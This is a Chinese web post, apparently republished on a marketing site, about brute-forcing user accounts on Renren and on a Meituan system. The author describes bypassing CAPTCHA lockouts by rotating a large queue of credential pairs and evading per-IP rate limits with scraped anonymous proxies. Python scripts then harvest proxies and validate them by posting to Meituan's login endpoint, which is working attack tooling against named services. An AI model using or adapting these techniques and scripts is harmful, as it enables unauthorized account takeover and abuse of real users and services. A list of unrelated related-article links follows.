全网整合营销服务商

电脑端+手机端+微信端=数据同步管理

免费咨询热线:400-708-3566

批量获取及验证HTTP代理的Python脚本

1. 在扫号人人网时,我遇到单个账号错误两次,强制要求输入验证码,而对方并未实施IP策略。

我采用维护10万(用户名,密码) 队列的方式来绕过验证码。具体的做法是,当某个用户名、密码组合遇到需要验证码,就把该破解序列挂起,放到队列尾部等待下次测试,继续破解其他账号密码。

这样就可以保证2/3的时间都在进行正常破解和扫号。

2. 在破解美团网某系统账号时,我遇到了单个IP访问有一定限制,请求频率不可过快。于是我挂了72个 HTTP代理来解决这个问题。 看似每个IP的请求都正常,但其实从整个程序上看,效率还是挺可观的。

本篇我发出自己抓HTTP的脚本片段,其实只有几行。匿名代理是从这里抓取的:http://www.xici.net.co/nn/

首先获取代理列表 :

from bs4 import BeautifulSoup
import urllib2


of = open('proxy.txt' , 'w')

for page in range(1, 160):
  html_doc = urllib2.urlopen('http://www.xici.net.co/nn/' + str(page) ).read()
  soup = BeautifulSoup(html_doc)
  trs = soup.find('table', id='ip_list').find_all('tr')
  for tr in trs[1:]:
    tds = tr.find_all('td')
    ip = tds[1].text.strip()
    port = tds[2].text.strip()
    protocol = tds[5].text.strip()
    if protocol == 'HTTP' or protocol == 'HTTPS':
      of.write('%s=%s:%s\n' % (protocol, ip, port) )
      print '%s=%s:%s' % (protocol, ip, port)

of.close()

接着验证代理是否可用,因为我是用于破解美团网系统的账号,因此用了美团的页面标记:

#encoding=gbk
import httplib
import time
import urllib
import threading

inFile = open('proxy.txt', 'r')
outFile = open('available.txt', 'w')

lock = threading.Lock()

def test():
  while True:
    lock.acquire()
    line = inFile.readline().strip()
    lock.release()
    if len(line) == 0: break
    protocol, proxy = line.split('=')
    headers = {'Content-Type': 'application/x-www-form-urlencoded',
      'Cookie': ''}
    try:
      conn = httplib.HTTPConnection(proxy, timeout=3.0)
      conn.request(method='POST', url='http://e.meituan.com/m/account/login', body='login=ttttttttttttttttttttttttttttttttttttt&password=bb&remember_username=1&auto_login=1', headers=headers )
      res = conn.getresponse()
      ret_headers = str( res.getheaders() ) 
      html_doc = res.read().decode('utf-8')
      print html_doc.encode('gbk')
      if ret_headers.find(u'/m/account/login/') > 0:
        lock.acquire()
        print 'add proxy', proxy
        outFile.write(proxy + '\n')
        lock.release()
      else:
        print '.',
    except Exception, e:
      print e

all_thread = []
for i in range(50):
  t = threading.Thread(target=test)
  all_thread.append(t)
  t.start()
  
for t in all_thread:
  t.join()

inFile.close()
outFile.close()


# 验证 HTTP代理 Python脚本  # Python程序中设置HTTP代理  # Python3.4实现从HTTP代理网站批量获取代理并筛选的方法示例  # Python request设置HTTPS代理代码解析  # 对python使用http、https代理的实例讲解  # Python代码实现http/https代理服务器的脚本  # python爬虫http代理使用方法  # Python异步爬虫requests和aiohttp中代理IP的使用  # python使用aiohttp通过设置代理爬取基金数据简单示例  # 解决python异步框架aiohttp无法使用本地代理问题  # python做http代理请求的项目实践  # 验证码  # 我是  # 都在  # 两次  # 有一定  # 是从  # 用了  # 上看  # 挂了  # 过快  # 解决这个问题  # 就可以  # 挂起  # 把该  # 几行  # 下次  # find  # trs  # table  # find_all 


相关文章: 可靠的网站设计制作软件,做网站设计需要什么样的电脑配置?  如何用已有域名快速搭建网站?  网站制作公司排行榜,四大门户网站排名?  学校免费自助建站系统:智能生成+拖拽设计+多端适配  建站主机系统SEO优化与智能配置核心关键词操作指南  ,巨量百应是干嘛的?  单页制作网站有哪些,朋友给我发了一个单页网站,我应该怎么修改才能把他变成自己的呢,请求高手指点迷津?  北京企业网站设计制作公司,北京铁路集团官方网站?  如何在腾讯云服务器上快速搭建个人网站?  零服务器AI建站解决方案:快速部署与云端平台低成本实践  Java解压缩zip - 解压缩多个文件或文件夹实例  如何选择建站程序?包含哪些必备功能与类型?  如何用好域名打造高点击率的自主建站?  如何通过宝塔面板实现本地网站访问?  无锡营销型网站制作公司,无锡网选车牌流程?  青岛网站设计制作公司,查询青岛招聘信息的网站有哪些?  如何快速建站并高效导出源代码?  常州企业建站如何选择最佳模板?  湖南网站制作公司,湖南上善若水科技有限公司做什么的?  建站三合一如何选?哪家性价比更高?  广州顶尖建站服务:企业官网建设与SEO优化一体化方案  建站之星如何修改网站生成路径?  网站广告牌制作方法,街上的广告牌,横幅,用PS还是其他软件做的?  Python路径拼接规范_跨平台处理说明【指导】  建站VPS选购需注意哪些关键参数?  网站设计制作企业有哪些,抖音官网主页怎么设置?  网站制作多少钱一个,建一个论坛网站大约需要多少钱?  公司门户网站制作流程,华为官网怎么做?  如何高效利用200m空间完成建站?  高端建站三要素:定制模板、企业官网与响应式设计优化  建站之星安装模板失败:服务器环境不兼容?  建站之星各版本价格是多少?  建站之星2.7模板快速切换与批量管理功能操作指南    如何选择靠谱的建站公司加盟品牌?  建设网站制作价格,怎样建立自己的公司网站?  建站IDE高效指南:快速搭建+SEO优化+自适应模板全解析  建站之星代理如何优化在线客服效率?  建站之星下载版如何获取与安装?  合肥制作网站的公司有哪些,合肥聚美网络科技有限公司介绍?  宝塔建站无法访问?如何排查配置与端口问题?  建站之星导航如何优化提升用户体验?  如何快速生成凡客建站的专业级图册?  商务网站制作工程师,从哪几个方面把握电子商务网站主页和页面的特色设计?  如何在服务器上三步完成建站并提升流量?  如何自己制作一个网站链接,如何制作一个企业网站,建设网站的基本步骤有哪些?  岳西云建站教程与模板下载_一站式快速建站系统操作指南  建站之星如何通过成品分离优化网站效率?  公司网站制作需要多少钱,找人做公司网站需要多少钱?  高防服务器租用首荐平台,企业级优惠套餐快速部署 

您的项目需求

*请认真填写需求信息,我们会在24小时内与您取得联系。